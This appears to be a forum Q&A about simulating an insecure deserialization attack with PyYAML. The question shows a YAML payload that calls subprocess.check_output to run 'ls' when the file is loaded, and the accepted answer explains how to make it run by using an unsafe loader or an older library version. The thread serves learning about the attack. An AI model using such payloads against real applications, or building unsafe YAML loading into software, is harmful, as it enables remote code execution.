# PyYAML giving constructor errors?

Tags: python, yaml, pyyaml

So I'm currently trying to simulate an Insecure Deserialization attack. Here's the code I'm using:

```
import yaml

with open('malicious.yml') as yaml_file:
    contents = yaml.load(yaml_file)
    print(contents['foo'])
```

The file malicious.yml contains the following:

```
foo: !!python/object/apply:subprocess.check_output ['ls']
```

However, when I run the script, I get the following error:

```
yaml.constructor.ConstructorError: could not determine a constructor for the tag 'tag:yaml.org,2002:python/object/apply:subprocess.check_output'
in "malicious.yml", line 1, column 6
```

I looked around a bit but still couldn't find why. Any help would be appreciated.

Answer (score 3, accepted):

If you are trying to simulate an insecure deserialization attack, you should use

```
contents = yaml.danger_load(yaml_file)
```

or use an older version of PyYAML (`pip install pyyaml<4`). The API was changed with version 4.1 without any documentation changes.

Comment: Worked perfectly, thanks!